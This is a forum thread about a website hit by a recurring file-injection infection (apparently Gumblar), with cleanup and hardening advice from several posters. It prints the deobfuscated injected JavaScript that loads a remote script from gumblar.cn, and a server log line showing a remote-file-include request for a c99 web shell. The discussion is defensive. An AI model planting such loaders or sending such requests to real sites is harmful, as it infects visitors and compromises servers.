Forum Infected by Virus - A trojan on My Board

[ee222]

Hello,

My forum is running on a hosting copany. My forum and the whole website were infected by virus last week on Friday. Most of the files were infected.

Infected files:

"index.html"
"index.htm"
"index.php"
"xxx.html"
"xxx.tbl"
"xxx.js"
...

All the files were modified by adding some code with the files. Here are the codes.

For the HTML files:

<removed - wige>

For the PHP files:

<removed - wige>

I did clear up(remove the codes form the files) all the files on this Monday and the web works fine, but today the website got the virus again. So, can someone tell me how to remove the virus? I alread scan my PC and it has no virus on it. Today I did clarn up the web site and it seems working fine now. But I am worry about the virus will come back again. Thanks.

[TechEvangelist]

I have seen things like this before. The virus has probably infected the entire server and not just your web site. That may be why it has returned. The hacker may have root access to the server.

The first thing to do is to report it to the hosting company. They need to check the security for your site and their server.

1. Make sure that permissions are set correctly for your web site scripts.

2. Change your access passwords (FTP,cPanel, root) and make sure they are very secure passwords. Do not use dictionary words for your passwords.

3. If you are using open source software or something you purchased, make sure the version is current and check their forums to see if others are having the same problem.

4. If it keeps coming back or the hosting company is not cooperative, find a new hosting company.

[seopo]

Someone has access to your server. You'll be cleaning twice a week for the forseable.

If your host has yet to deal with it the answer (which is a pain, but you already know) is to change hosts.

[chrisJumbo]

Had the very same problem. Thankfully we had good back-up, so for most of the files just uploaded versions without the script. The blog was harder, because the script was inserted in one of the main processing files. I found that by creating a new blog and comparing files.

I changed all passwords and so far have been free of a re-occurance. I told our host about the problem so they ran some scans as well.

[Tech Manager]

This doesn't look like a virus to me, per se. It looks more like you've experienced some cross-site injection attacks; which in essence are hacks. You need to make sure all your directories have the proper permissions and you need to properly validate all the variables inputted into your site.

In your logfiles look for http:// in your queries.

Here is a log example of a slightly similar type of attack. I've added a few spaces to prevent linking.

Quote:

189.81.252.195 - - [14/May/2009:14:07:02 -0500] "GET /product.php?page=http : // wuweizhou . com /cmd/c99.txt? HTTP/1.1" 302 - "-" "Mozilla/3.0 (compatible; Indy Library)"

You should also check with your IT guy to make sure your server is properly configured to prevent such attacks. Make sure your forum is up to date with security patches and, as mentioned previously, validate all user input and take steps to prevent string query exploits.

[jganders]

The javascript resolves to the following.
The real damage (whatever that may be) is done by a script being called at gumblar dot cn. I dont really want to run the script just to find out what it does.

Code:

var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;
if( (u.indexOf("Win")>0) && 
    (u.indexOf("NT 6")<0) && 
    (document.cookie.indexOf("miek=1") < 0) && 
    (typeof(zrvzts) != typeof("A"))) {
    zrvzts="A";
    eval("if(window."+a+") j = j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");
    document.write("<script src=//gumblar.cn/rss/?id="+j+">
    <\/script>");
}

Quote:

Originally Posted by chrisJumbo

Had the very same problem. Thankfully we had good back-up, so for most of the files just uploaded versions without the script. The blog was harder, because the script was inserted in one of the main processing files. I found that by creating a new blog and comparing files.

I changed all passwords and so far have been free of a re-occurance. I told our host about the problem so they ran some scans as well.

[mark3738]

We had this problem a few months ago and it was a pain to remove - what you will find is that in every index file this code will eventually be loaded and in every directory you will also probably find a php file with a number or weird name - you can usually remove them with ftp, BUT, the file that causes the most problem is the htaccess file which this hacker script injects into every directory - I had to use shell access to be able to see the htaccess files and manually delete every file as well.

In our case the hosting company initially told us that it was all our fault and nothing to do with them, then after I took the whole website down (including about 300,000 images), cleaned it all out and rebuilt the site using all the latest software upgrades, the hosting company sent out a letter saying how proactive they were and had caught this attack and cleaned it on 23,000 sites they host.

To say the least we were not impressed.

However, contact the hosting company straightaway and tell them, as they may be able to strip the bogus php files and htaccess files quickly for you, else you may have a laborious process removing them all yourself.

Also put your site into maintenance mode if you can else you will begin infecting visitor computers - we also had this and had a warning coming up from Google to say we were not safe to visit, which seriously impacts on profits quite quickly until being reinstated.

Good luck

[TechEvangelist]

Quote:

Originally Posted by mark3738

In our case the hosting company initially told us that it was all our fault and nothing to do with them, then after I took the whole website down (including about 300,000 images), cleaned it all out and rebuilt the site using all the latest software upgrades, the hosting company sent out a letter saying how proactive they were and had caught this attack and cleaned it on 23,000 sites they host.

Unfortunately, that is a typical response from many hosting companies. If they really were proactive, they would have put proper security measures in place to prevent the attack on their servers. If the servers are vulnerable, there isn't much that a site owner can do to protect their sites.

[danlefree]

Most likely vector: outdated software. Make sure you apply any and all updates to all software running on your site.

If you have the ability to disable or aggressively restrict remote file includes and filesystem access within PHP, do so.